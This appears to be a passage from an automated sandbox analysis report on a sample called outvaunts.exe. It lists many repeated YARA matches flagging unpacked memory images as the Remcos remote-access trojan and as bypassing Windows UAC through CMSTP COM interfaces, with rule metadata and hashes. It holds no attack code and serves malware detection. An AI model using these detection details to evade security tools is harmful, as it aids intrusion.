              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
